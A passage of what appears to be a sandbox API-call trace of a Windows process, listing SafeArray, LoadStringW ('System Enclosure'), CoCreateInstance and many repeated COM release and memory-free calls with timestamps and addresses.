(in: psa=0x15a70a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.389] memcpy (in: _Dst=0x17800ec, _Src=0x182f2e0, _Size=0x4 | out: _Dst=0x17800ec) returned 0x17800ec [0358.389] SafeArrayUnaccessData (psa=0x15a70a0) returned 0x0 [0358.389] SafeArrayAccessData (in: psa=0x15a6620, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.389] memcpy (in: _Dst=0x17800f4, _Src=0x182f140, _Size=0x4 | out: _Dst=0x17800f4) returned 0x17800f4 [0358.389] SafeArrayUnaccessData (psa=0x15a6620) returned 0x0 [0358.493] LoadStringW (in: hInstance=0x7fffb3c00000, uID=0x3f, lpBuffer=0x5ed5e0, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0358.493] SafeArrayPutElement (psa=0x15a70a0, rgIndices=0x5ed844, pv=0x5ed840) returned 0x0 [0372.816] LoadStringW (in: hInstance=0x7fffb3c00000, uID=0x3f, lpBuffer=0x5ed5e0, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0372.816] SafeArrayPutElement (psa=0x15a6e20, rgIndices=0x5ed844, pv=0x5ed840) returned 0x0 [0377.607] LoadStringW (in: hInstance=0x7fffb3c00000, uID=0x3f, lpBuffer=0x5ed5e0, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0377.607] SafeArrayPutElement (psa=0x15a6860, rgIndices=0x5ed844, pv=0x5ed840) returned 0x0 [0382.349] CoCreateInstance (in: rclsid=0x7fffb3d76cc8*(Data1=0x752073a1, Data2=0x23f2, Data3=0x4396, Data4=([0]=0x85, [1]=0xf0, [2]=0x8f, [3]=0xdb, [4]=0x87, [5]=0x9e, [6]=0xd0, [7]=0xed)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fffb3d54150*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5ed8e0 | out: ppv=0x5ed8e0*=0x158d5e0) returned 0x0 [0382.471] IUnknown:QueryInterface (in: This=0x158d5e0, riid=0x7fffb3d76cb8*(Data1=0x75207391, Data2=0x23f2, Data3=0x4396, Data4=([0]=0x85, [1]=0xf0, [2]=0x8f, [3]=0xdb, [4]=0x87, [5]=0x9e, [6]=0xd0, [7]=0xed)), ppvObject=0x5ed8c0 | out: ppvObject=0x5ed8c0*=0x1827bc8) returned 0x0 [0382.514] ObjectStublessClient3 () [0382.515] ObjectStublessClient8 () [0382.873] ObjectStublessClient7 () [0382.878] ObjectStublessClient6 () [0382.946] IUnknown:QueryInterface (in: This=0x1757080, riid=0x7fffb3d76ca8*(Data1=0x75207393, Data2=0x23f2, Data3=0x4396, Data4=([0]=0x85, [1]=0xf0, [2]=0x8f, [3]=0xdb, [4]=0x87, [5]=0x9e, [6]=0xd0, [7]=0xed)), ppvObject=0x5ed8f0 | out: ppvObject=0x5ed8f0*=0x4a79f8) returned 0x0 [0382.947] ObjectStublessClient5 () [0383.846] ObjectStublessClient3 () [0383.849] ObjectStublessClient3 () [0383.850] ObjectStublessClient3 () [0383.857] ObjectStublessClient8 () [0383.865] CoTaskMemFree (pv=0x52f6e0) [0383.866] CoTaskMemFree (pv=0x4a7ec0) [0383.866] IUnknown:Release (This=0x4a8168) returned 0x0 [0383.866] ObjectStublessClient3 () [0383.867] ObjectStublessClient3 () [0383.868] ObjectStublessClient3 () [0383.876] ObjectStublessClient8 () [0383.933] CoTaskMemFree (pv=0x4b02f0) [0383.933] CoTaskMemFree (pv=0x4a7ec0) [0383.933] IUnknown:Release (This=0x4a8168) returned 0x0 [0383.934] ObjectStublessClient3 () [0383.935] ObjectStublessClient3 () [0383.936] ObjectStublessClient3 () [0383.942] ObjectStublessClient8 () [0383.949] CoTaskMemFree (pv=0x158ebc0) [0383.949] CoTaskMemFree (pv=0x158f9a0) [0383.949] IUnknown:Release (This=0x4a7ec8) returned 0x0 [0383.950] ObjectStublessClient3 () [0383.950] ObjectStublessClient3 () [0383.951] ObjectStublessClient3 () [0383.958] ObjectStublessClient8 () [0383.979] CoTaskMemFree (pv=0x15a7050) [0383.979] CoTaskMemFree (pv=0x158ebc0) [0383.979] IUnknown:Release (This=0x4a7e58) returned 0x0 [0383.980] ObjectStublessClient3 () [0383.981] ObjectStublessClient3 () [0383.981] ObjectStublessClient3 () [0383.988] ObjectStublessClient8 () [0383.997] CoTaskMemFree (pv=0x4c8980) [0383.997] CoTaskMemFree (pv=0x52ebf0) [0383.997] IUnknown:Release (This=0x4a7e58) returned 0x0 [0383.997] ObjectStublessClient3 () [0383.998] ObjectStublessClient3 () [0383.999] ObjectStublessClient3 () [0384.007] ObjectStublessClient8 () [0384.013] CoTaskMemFree (pv=0x15a7050) [0384.013] CoTaskMemFree (pv=0x15a6d10) [0384.013] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.014] ObjectStublessClient3 () [0384.015] ObjectStublessClient3 () [0384.016] ObjectStublessClient3 () [0384.023] ObjectStublessClient8 () [0384.032] CoTaskMemFree (pv=0x15a6690) [0384.032] CoTaskMemFree (pv=0x4b03b0) [0384.032] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.033] ObjectStublessClient3 () [0384.034] ObjectStublessClient3 () [0384.034] ObjectStublessClient3 () [0384.042] ObjectStublessClient8 () [0384.049] CoTaskMemFree (pv=0x52ebf0) [0384.049] CoTaskMemFree (pv=0x15a6d10) [0384.049] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.050] ObjectStublessClient3 () [0384.050] ObjectStublessClient3 () [0384.051] ObjectStublessClient3 () [0384.057] ObjectStublessClient8 () [0384.059] CoTaskMemFree (pv=0x52ebf0) [0384.059] CoTaskMemFree (pv=0x52f6e0) [0384.059] IUnknown:Release (This=0x4a7ec8) returned 0x0 [0384.059] ObjectStublessClient3 () [0384.060] ObjectStublessClient3 () [0384.061] ObjectStublessClient3 () [0384.070] ObjectStublessClient8 () [0384.078] CoTaskMemFree (pv=0x15a7090) [0384.078] CoTaskMemFree (pv=0x15a6690) [0384.078] IUnknown:Release (This=0x4a8168) returned 0x0 [0384.079] ObjectStublessClient3 () [0384.080] ObjectStublessClient3 () [0384.081] ObjectStublessClient3 () [0384.087] ObjectStublessClient8 () [0384.089] CoTaskMemFree (pv=0x158f040) [0384.089] CoTaskMemFree (pv=0x158f700) [0384.089] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.090] ObjectStublessClient3 () [0384.090] ObjectStublessClient3 () [0384.091] ObjectStublessClient3 () [0384.093] ObjectStublessClient8 () [0384.100] CoTaskMemFree (pv=0x158f580) [0384.100] CoTaskMemFree (pv=0x4c8780) [0384.100] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.101] ObjectStublessClient3 () [0384.101] ObjectStublessClient3 () [0384.102] ObjectStublessClient3 () [0384.104] ObjectStublessClient8 () [0384.113] CoTaskMemFree (pv=0x52f6e0) [0384.113] CoTaskMemFree (pv=0x4a8160) [0384.113] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.114] ObjectStublessClient3 () [0384.115] ObjectStublessClient3 () [0384.115] ObjectStublessClient3 () [0384.117] ObjectStublessClient8 () [0384.125] CoTaskMemFree (pv=0x52f6e0) [0384.125] CoTaskMemFree (pv=0x4a8160) [0384.125] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.125] ObjectStublessClient3 () [0384.127] ObjectStublessClient3 () [0384.128] ObjectStublessClient3 () [0384.136] ObjectStublessClient8 () [0384.315] CoTaskMemFree (pv=0x4c9000) [0384.315] CoTaskMemFree (pv=0x15a6690) [0384.315] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.316] ObjectStublessClient3 () [0384.318] ObjectStublessClient3 () [0384.318] ObjectStublessClient3 () [0384.326] ObjectStublessClient8 () [0384.327] CoTaskMemFree (pv=0x52ee20) [0384.327] CoTaskMemFree (pv=0x4a8160) [0384.327] IUnknown:Release (This=0x4a7e58) returned 0x0 [0384.327] ObjectStublessClient3 () [0384.328] ObjectStublessClient3 () [0384.330] ObjectStublessClient3 () [0384.331] ObjectStublessClient8 () [0388.720] CoTaskMemFree (pv=0x158f9a0) [0388.720] CoTaskMemFree (pv=0x158f0a0) [0388.721] IUnknown:Release (This=0x4a8168) returned 0x0 [0388.722] ObjectStublessClient3 () [0388.724] ObjectStublessClient3 () [0388.725] ObjectStublessClient3 () [0388.737] ObjectStublessClient8 () [0388.747] CoTaskMemFree (pv=0x158ec80) [0388.747] CoTaskMemFree (pv=0x158ee60) [0388.747] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.011] ObjectStublessClient3 () [0389.012] ObjectStublessClient3 () [0389.013] ObjectStublessClient3 () [0389.015] ObjectStublessClient8 () [0389.022] CoTaskMemFree (pv=0x158f9a0) [0389.022] CoTaskMemFree (pv=0x15a7050) [0389.022] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.022] ObjectStublessClient3 () [0389.023] ObjectStublessClient3 () [0389.024] ObjectStublessClient3 () [0389.034] ObjectStublessClient8 () [0389.094] CoTaskMemFree (pv=0x4a8160) [0389.094] CoTaskMemFree (pv=0x15a6d10) [0389.094] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.095] ObjectStublessClient3 () [0389.095] ObjectStublessClient3 () [0389.096] ObjectStublessClient3 () [0389.099] ObjectStublessClient8 () [0389.101] CoTaskMemFree (pv=0x15a6690) [0389.101] CoTaskMemFree (pv=0x52f6e0) [0389.101] IUnknown:Release (This=0x4a8168) returned 0x0 [0389.101] ObjectStublessClient3 () [0389.102] ObjectStublessClient3 () [0389.102] ObjectStublessClient3 () [0389.116] ObjectStublessClient8 () [0389.163] CoTaskMemFree (pv=0x158f700) [0389.163] CoTaskMemFree (pv=0x52f6e0) [0389.163] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.164] ObjectStublessClient3 () [0389.164] ObjectStublessClient3 () [0389.165] ObjectStublessClient3 () [0389.166] ObjectStublessClient8 () [0389.169] CoTaskMemFree (pv=0x52ebf0) [0389.169] CoTaskMemFree (pv=0x15a6950) [0389.169] IUnknown:Release (This=0x4a8168) returned 0x0 [0389.169] ObjectStublessClient3 () [0389.170] ObjectStublessClient3 () [0389.170] ObjectStublessClient3 () [0389.171] ObjectStublessClient8 () [0389.174] CoTaskMemFree (pv=0x52ebf0) [0389.174] CoTaskMemFree (pv=0x52ef60) [0389.174] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.174] ObjectStublessClient3 () [0389.175] ObjectStublessClient3 () [0389.175] ObjectStublessClient3 () [0389.177] ObjectStublessClient8 () [0389.373] CoTaskMemFree (pv=0x15a6950) [0389.373] CoTaskMemFree (pv=0x15a6690) [0389.373] IUnknown:Release (This=0x4a7e58) returned 0x0 [0389.374] ObjectStublessClient3 () [0389.375] ObjectStublessClient3 () [0389.375] ObjectStublessClient3 () [0389.377] ObjectStublessClient8 () [0389.549] CoTaskMemFree (pv=0x52ebf0) [0389.549] CoTaskMemFree (pv=0x52f6e0) [0389.549] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.549] ObjectStublessClient3 () [0389.550] ObjectStublessClient3 () [0389.551] ObjectStublessClient3 () [0389.552] ObjectStublessClient8 () [0389.554] CoTaskMemFree (pv=0x4b3eb0) [0389.555] CoTaskMemFree (pv=0x158f340) [0389.555] IUnknown:Release (This=0x4b3e48) returned 0x0 [0389.555] ObjectStublessClient3 () [0389.556] ObjectStublessClient3 () [0389.556] ObjectStublessClient3 () [0389.557] ObjectStublessClient8 () [0389.595] CoTaskMemFree (pv=0x52ece0) [0389.595] CoTaskMemFree (pv=0x52ebf0) [0389.595] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.595] ObjectStublessClient3 () [0389.596] ObjectStublessClient3 () [0389.596] ObjectStublessClient3 () [0389.598] ObjectStublessClient8 () [0389.635] CoTaskMemFree (pv=0x52ef60) [0389.635] CoTaskMemFree (pv=0x158f580) [0389.635] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0389.636] ObjectStublessClient3 () [0389.636] ObjectStublessClient3 () [0389.637] ObjectStublessClient3 () [0389.638] ObjectStublessClient8 () [0389.640] CoTaskMemFree (pv=0x52f6e0) [0389.640] CoTaskMemFree (pv=0x158eda0) [0389.640] IUnknown:Release (This=0x4b40e8) returned 0x0 [0389.641] ObjectStublessClient3 () [0389.641] ObjectStublessClient3 () [0389.642] ObjectStublessClient3 () [0389.643] ObjectStublessClient8 () [0389.674] CoTaskMemFree (pv=0x15a7050) [0389.674] CoTaskMemFree (pv=0x15a6690) [0389.674] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0389.675] ObjectStublessClient3 () [0389.675] ObjectStublessClient3 () [0389.676] ObjectStublessClient3 () [0389.677] ObjectStublessClient8 () [0389.689] CoTaskMemFree (pv=0x15a7390) [0389.689] CoTaskMemFree (pv=0x52ebf0) [0389.689] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.690] ObjectStublessClient3 () [0389.690] ObjectStublessClient3 () [0389.691] ObjectStublessClient3 () [0389.692] ObjectStublessClient8 () [0389.726] CoTaskMemFree (pv=0x15a7390) [0389.726] CoTaskMemFree (pv=0x52f6e0) [0389.726] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.727] ObjectStublessClient3 () [0389.727] ObjectStublessClient3 () [0389.728] ObjectStublessClient3 () [0389.729] ObjectStublessClient8 () [0389.761] CoTaskMemFree (pv=0x4b0590) [0389.761] CoTaskMemFree (pv=0x15a73d0) [0389.761] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.761] ObjectStublessClient3 () [0389.762] ObjectStublessClient3 () [0389.763] ObjectStublessClient3 () [0389.764] ObjectStublessClient8 () [0389.766] CoTaskMemFree (pv=0x15a7010) [0389.766] CoTaskMemFree (pv=0x15a6c50) [0389.766] IUnknown:Release (This=0x4b40e8) returned 0x0 [0389.766] ObjectStublessClient3 () [0389.768] ObjectStublessClient3 () [0389.768] ObjectStublessClient3 () [0389.770] ObjectStublessClient8 () [0389.857] CoTaskMemFree (pv=0x52f050) [0389.857] CoTaskMemFree (pv=0x52ef60) [0389.857] IUnknown:Release (This=0x4b4548) returned 0x0 [0389.858] ObjectStublessClient3 () [0389.858] ObjectStublessClient3 () [0389.860] ObjectStublessClient3 () [0389.861] ObjectStublessClient8 () [0389.906] CoTaskMemFree (pv=0x52ef60) [0389.906] CoTaskMemFree (pv=0x52f6e0) [0389.906] IUnknown:Release (This=0x4b3eb8) returned 0x0 [0389.907] ObjectStublessClient3 () [0389.907] ObjectStublessClient3 () [0389.908] ObjectStublessClient3 () [0389.909] ObjectStublessClient8 () [0389.940] CoTaskMemFree (pv=0x15a6b10) [0389.940] CoTaskMemFree (pv=0x15a7010) [0389.940] IUnknown:Release (This=0x4b40e8) returned 0x0 [0389.940] ObjectStublessClient3 () [0389.941] ObjectStublessClient3 () [0389.941] ObjectStublessClient3 () [0389.943] ObjectStublessClient8 () [0389.946] CoTaskMemFree (pv=0x52f190) [0389.946] CoTaskMemFree (pv=0x15a6b10) [0389.946] IUnknown:Release (This=0x4b3e48) returned 0x0 [0389.947] ObjectStublessClient3 () [0389.947] ObjectStublessClient3 () [0389.949] ObjectStublessClient3 () [0389.951] ObjectStublessClient8 () [0389.981] CoTaskMemFree (pv=0x158f400) [0389.981] CoTaskMemFree (pv=0x158f9a0) [0389.981] IUnknown:Release (This=0x4b3e48) returned 0x0 [0389.981] ObjectStublessClient3 () [0389.982] ObjectStublessClient3 () [0389.983] ObjectStublessClient3 () [0389.984] ObjectStublessClient8 () [0389.986] CoTaskMemFree (pv=0x52f6e0) [0389.986] CoTaskMemFree (pv=0x158f520) [0389.986] IUnknown:Release (This=0x4b3e48) returned 0x0 [0389.987] ObjectStublessClient3 () [0389.987] ObjectStublessClient3 () [0389.988] ObjectStublessClient3 () [0389.989] ObjectStublessClient8 () [0390.044] CoTaskMemFree (pv=0x4b3f20) [0390.044] CoTaskMemFree (pv=0x158ec80) [0390.044] IUnknown:Release (This=0x4b3e48) returned 0x0 [0390.045] ObjectStublessClient3 () [0390.045] ObjectStublessClient3 () [0390.046] ObjectStublessClient3 () [0390.047] ObjectStublessClient8 () [0390.050] CoTaskMemFree (pv=0x158f160) [0390.050] CoTaskMemFree (pv=0x158f520) [0390.050] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.051] ObjectStublessClient3 () [0390.051] ObjectStublessClient3 () [0390.052] ObjectStublessClient3 () [0390.053] ObjectStublessClient8 () [0390.057] CoTaskMemFree (pv=0x4c65e0) [0390.057] CoTaskMemFree (pv=0x15a6950) [0390.057] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.057] ObjectStublessClient3 () [0390.058] ObjectStublessClient3 () [0390.058] ObjectStublessClient3 () [0390.060] ObjectStublessClient8 () [0390.060] CoTaskMemFree (pv=0x4b40e0) [0390.060] CoTaskMemFree (pv=0x158f520) [0390.061] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.061] ObjectStublessClient3 () [0390.062] ObjectStublessClient3 () [0390.062] ObjectStublessClient3 () [0390.063] ObjectStublessClient8 () [0390.075] CoTaskMemFree (pv=0x15a6c50) [0390.075] CoTaskMemFree (pv=0x52ebf0) [0390.075] IUnknown:Release (This=0x4b3f28) returned 0x0 [0390.076] ObjectStublessClient3 () [0390.077] ObjectStublessClient3 () [0390.077] ObjectStublessClient3 () [0390.078] ObjectStublessClient8 () [0390.081] CoTaskMemFree (pv=0x52ece0) [0390.081] CoTaskMemFree (pv=0x52ebf0) [0390.081] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.081] ObjectStublessClient3 () [0390.082] ObjectStublessClient3 () [0390.082] ObjectStublessClient3 () [0390.083] ObjectStublessClient8 () [0390.095] CoTaskMemFree (pv=0x52ece0) [0390.095] CoTaskMemFree (pv=0x52ebf0) [0390.095] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0390.102] ObjectStublessClient3 () [0390.103] ObjectStublessClient3 () [0390.103] ObjectStublessClient3 () [0390.104] ObjectStublessClient8 () [0390.106] CoTaskMemFree (pv=0x4c8600) [0390.106] CoTaskMemFree (pv=0x52ee70) [0390.106] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.107] ObjectStublessClient3 () [0390.107] ObjectStublessClient3 () [0390.108] ObjectStublessClient3 () [0390.122] ObjectStublessClient8 () [0390.156] CoTaskMemFree (pv=0x15a7010) [0390.156] CoTaskMemFree (pv=0x52ebf0) [0390.156] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.157] ObjectStublessClient3 () [0390.157] ObjectStublessClient3 () [0390.158] ObjectStublessClient3 () [0390.159] ObjectStublessClient8 () [0390.191] CoTaskMemFree (pv=0x52f6e0) [0390.191] CoTaskMemFree (pv=0x52ebf0) [0390.191] IUnknown:Release (This=0x4b3f28) returned 0x0 [0390.191] ObjectStublessClient3 () [0390.192] ObjectStublessClient3 () [0390.193] ObjectStublessClient3 () [0390.194] ObjectStublessClient8 () [0390.243] CoTaskMemFree (pv=0x52ebf0) [0390.243] CoTaskMemFree (pv=0x52f6e0) [0390.243] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.243] ObjectStublessClient3 () [0390.244] ObjectStublessClient3 () [0390.244] ObjectStublessClient3 () [0390.246] ObjectStublessClient8 () [0390.280] CoTaskMemFree (pv=0x52f6e0) [0390.280] CoTaskMemFree (pv=0x15a7010) [0390.280] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0390.280] ObjectStublessClient3 () [0390.281] ObjectStublessClient3 () [0390.282] ObjectStublessClient3 () [0390.283] ObjectStublessClient8 () [0390.314] CoTaskMemFree (pv=0x52ebf0) [0390.314] CoTaskMemFree (pv=0x15a6690) [0390.314] IUnknown:Release (This=0x4b4548) returned 0x0 [0390.314] ObjectStublessClient3 () [0390.315] ObjectStublessClient3 () [0390.316] ObjectStublessClient3 () [0390.317] ObjectStublessClient8 () [0390.349] CoTaskMemFree (pv=0x158ef20) [0390.349] CoTaskMemFree (pv=0x52f6e0) [0390.349] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.349] ObjectStublessClient3 () [0390.350] ObjectStublessClient3 () [0390.352] ObjectStublessClient3 () [0390.353] ObjectStublessClient8 () [0390.388] CoTaskMemFree (pv=0x15a7010) [0390.388] CoTaskMemFree (pv=0x15a6950) [0390.388] IUnknown:Release (This=0x4b40e8) returned 0x0 [0390.388] ObjectStublessClient3 () [0390.389] ObjectStublessClient3 () [0390.389] ObjectStublessClient3 () [0390.391] ObjectStublessClient8 () [0390.425] CoTaskMemFree (pv=0x15a6c50) [0390.425] CoTaskMemFree (pv=0x15a7390) [0390.425] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.426] ObjectStublessClient3 () [0390.426] ObjectStublessClient3 () [0390.427] ObjectStublessClient3 () [0390.428] ObjectStublessClient8 () [0390.580] CoTaskMemFree (pv=0x4b0590) [0390.580] CoTaskMemFree (pv=0x4b04a0) [0390.580] IUnknown:Release (This=0x4b4468) returned 0x0 [0390.581] ObjectStublessClient3 () [0390.581] ObjectStublessClient3 () [0390.582] ObjectStublessClient3 () [0390.584] ObjectStublessClient8 () [0390.617] CoTaskMemFree (pv=0x4b02c0) [0390.617] CoTaskMemFree (pv=0x4b0140) [0390.617] IUnknown:Release (This=0x4b4548) returned 0x0 [0390.618] ObjectStublessClient3 () [0390.619] ObjectStublessClient3 () [0390.619] ObjectStublessClient3 () [0390.620] ObjectStublessClient8 () [0390.654] CoTaskMemFree (pv=0x52ebf0) [0390.654] CoTaskMemFree (pv=0x52f6e0) [0390.654] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.655] ObjectStublessClient3 () [0390.656] ObjectStublessClient3 () [0390.656] ObjectStublessClient3 () [0390.658] ObjectStublessClient8 () [0390.701] CoTaskMemFree (pv=0x15a7010) [0390.701] CoTaskMemFree (pv=0x15a6950) [0390.701] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.702] ObjectStublessClient3 () [0390.703] ObjectStublessClient3 () [0390.703] ObjectStublessClient3 () [0390.705] ObjectStublessClient8 () [0390.738] CoTaskMemFree (pv=0x52f6e0) [0390.738] CoTaskMemFree (pv=0x52ebf0) [0390.738] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.738] ObjectStublessClient3 () [0390.739] ObjectStublessClient3 () [0390.740] ObjectStublessClient3 () [0390.741] ObjectStublessClient8 () [0390.775] CoTaskMemFree (pv=0x15a7390) [0390.775] CoTaskMemFree (pv=0x52f6e0) [0390.775] IUnknown:Release (This=0x4b4468) returned 0x0 [0390.775] ObjectStublessClient3 () [0390.776] ObjectStublessClient3 () [0390.776] ObjectStublessClient3 () [0390.777] ObjectStublessClient8 () [0390.809] CoTaskMemFree (pv=0x52ee20) [0390.809] CoTaskMemFree (pv=0x52f6e0) [0390.809] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.809] ObjectStublessClient3 () [0390.810] ObjectStublessClient3 () [0390.810] ObjectStublessClient3 () [0390.811] ObjectStublessClient8 () [0390.842] CoTaskMemFree (pv=0x158f220) [0390.842] CoTaskMemFree (pv=0x158ebc0) [0390.842] IUnknown:Release (This=0x4b3f28) returned 0x0 [0390.842] ObjectStublessClient3 () [0390.843] ObjectStublessClient3 () [0390.844] ObjectStublessClient3 () [0390.845] ObjectStublessClient8 () [0390.893] CoTaskMemFree (pv=0x52ece0) [0390.893] CoTaskMemFree (pv=0x52ebf0) [0390.893] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.894] ObjectStublessClient3 () [0390.894] ObjectStublessClient3 () [0390.895] ObjectStublessClient3 () [0390.896] ObjectStublessClient8 () [0390.928] CoTaskMemFree (pv=0x52f6e0) [0390.928] CoTaskMemFree (pv=0x52ebf0) [0390.928] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0390.929] ObjectStublessClient3 () [0390.930] ObjectStublessClient3 () [0390.930] ObjectStublessClient3 () [0390.931] ObjectStublessClient8 () [0390.933] CoTaskMemFree (pv=0x52ef60) [0390.933] CoTaskMemFree (pv=0x52f6e0) [0390.933] IUnknown:Release (This=0x4b3eb8) returned 0x0 [0390.934] ObjectStublessClient3 () [0390.934] ObjectStublessClient3 () [0390.935] ObjectStublessClient3 () [0390.936] ObjectStublessClient8 () [0390.938] CoTaskMemFree (pv=0x52f190) [0390.938] CoTaskMemFree (pv=0x52f6e0) [0390.938] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.939] ObjectStublessClient3 () [0390.939] ObjectStublessClient3 () [0390.940] ObjectStublessClient3 () [0390.941] ObjectStublessClient8 () [0390.943] CoTaskMemFree (pv=0x158f160) [0390.943] CoTaskMemFree (pv=0x52f6e0) [0390.943] IUnknown:Release (This=0x4b4468) returned 0x0 [0390.943] ObjectStublessClient3 () [0390.944] ObjectStublessClient3 () [0390.944] ObjectStublessClient3 () [0390.946] ObjectStublessClient8 () [0390.952] CoTaskMemFree (pv=0x15a6d10) [0390.952] CoTaskMemFree (pv=0x15a6c50) [0390.952] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0390.952] ObjectStublessClient3 () [0390.953] ObjectStublessClient3 () [0390.953] ObjectStublessClient3 () [0390.954] ObjectStublessClient8 () [0391.029] CoTaskMemFree (pv=0x15a6a90) [0391.029] CoTaskMemFree (pv=0x15a6690) [0391.029] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.029] ObjectStublessClient3 () [0391.030] ObjectStublessClient3 () [0391.031] ObjectStublessClient3 () [0391.032] ObjectStublessClient8 () [0391.064] CoTaskMemFree (pv=0x52f6e0) [0391.064] CoTaskMemFree (pv=0x52ebf0) [0391.064] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.064] ObjectStublessClient3 () [0391.065] ObjectStublessClient3 () [0391.066] ObjectStublessClient3 () [0391.074] ObjectStublessClient8 () [0391.081] CoTaskMemFree (pv=0x15a6950) [0391.081] CoTaskMemFree (pv=0x15a6c50) [0391.081] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.081] ObjectStublessClient3 () [0391.082] ObjectStublessClient3 () [0391.083] ObjectStublessClient3 () [0391.096] ObjectStublessClient8 () [0391.101] CoTaskMemFree (pv=0x15a6690) [0391.101] CoTaskMemFree (pv=0x52ee20) [0391.101] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.102] ObjectStublessClient3 () [0391.103] ObjectStublessClient3 () [0391.104] ObjectStublessClient3 () [0391.105] ObjectStublessClient8 () [0391.110] CoTaskMemFree (pv=0x15a7010) [0391.110] CoTaskMemFree (pv=0x52ebf0) [0391.110] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0391.110] ObjectStublessClient3 () [0391.111] ObjectStublessClient3 () [0391.112] ObjectStublessClient3 () [0391.113] ObjectStublessClient8 () [0391.118] CoTaskMemFree (pv=0x52ebf0) [0391.118] CoTaskMemFree (pv=0x52ece0) [0391.118] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.118] ObjectStublessClient3 () [0391.119] ObjectStublessClient3 () [0391.119] ObjectStublessClient3 () [0391.121] ObjectStublessClient8 () [0391.125] CoTaskMemFree (pv=0x4b4540) [0391.125] CoTaskMemFree (pv=0x52f190) [0391.125] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.126] ObjectStublessClient3 () [0391.126] ObjectStublessClient3 () [0391.127] ObjectStublessClient3 () [0391.128] ObjectStublessClient8 () [0391.133] CoTaskMemFree (pv=0x52ebf0) [0391.133] CoTaskMemFree (pv=0x52ee20) [0391.133] IUnknown:Release (This=0x4b4548) returned 0x0 [0391.134] ObjectStublessClient3 () [0391.134] ObjectStublessClient3 () [0391.135] ObjectStublessClient3 () [0391.143] ObjectStublessClient8 () [0391.145] CoTaskMemFree (pv=0x4b3dd0) [0391.145] CoTaskMemFree (pv=0x15a7050) [0391.145] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.145] ObjectStublessClient3 () [0391.146] ObjectStublessClient3 () [0391.146] ObjectStublessClient3 () [0391.147] ObjectStublessClient8 () [0391.154] CoTaskMemFree (pv=0x15a73d0) [0391.154] CoTaskMemFree (pv=0x15a7390) [0391.154] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.154] ObjectStublessClient3 () [0391.155] ObjectStublessClient3 () [0391.155] ObjectStublessClient3 () [0391.156] ObjectStublessClient8 () [0391.163] CoTaskMemFree (pv=0x4c9000) [0391.163] CoTaskMemFree (pv=0x15a73d0) [0391.163] IUnknown:Release (This=0x4b3cf8) returned 0x0 [0391.164] ObjectStublessClient3 () [0391.165] ObjectStublessClient3 () [0391.165] ObjectStublessClient3 () [0391.166] ObjectStublessClient8 () [0391.173] CoTaskMemFree (pv=0x4c65e0) [0391.173] CoTaskMemFree (pv=0x52f6e0) [0391.173] IUnknown:Release (This=0x4b3dd8) returned 0x0 [0391.173] ObjectStublessClient3 () [0391.174] ObjectStublessClient3 () [0391.174] ObjectStublessClient3 () [0391.175] ObjectStublessClient8 () [0391.183] CoTaskMemFree (pv=0x52f190) [0391.183] CoTaskMemFree (pv=0x15a7090) [0391.183] IUnknown:Release (This=0x4b4468) returned 0x0 [0391.184] ObjectStublessClient3 () [0391.184] ObjectStublessClient3 () [0391.185] ObjectStublessClient3 () [0391.186] ObjectStublessClient8 () [0391.192] CoTaskMemFree (pv=0x52f6e0) [0391.192] CoTaskMemFree (pv=0x15a6d10) [0391.192] IUnknown:Release (This=0x4b3eb8) returned 0x0 [0391.193] ObjectStublessClient3 () [0391.193] ObjectStublessClient3 () [0391.194] ObjectStublessClient3 () [0391.195] ObjectStublessClient8 () [0391.201] CoTaskMemFree 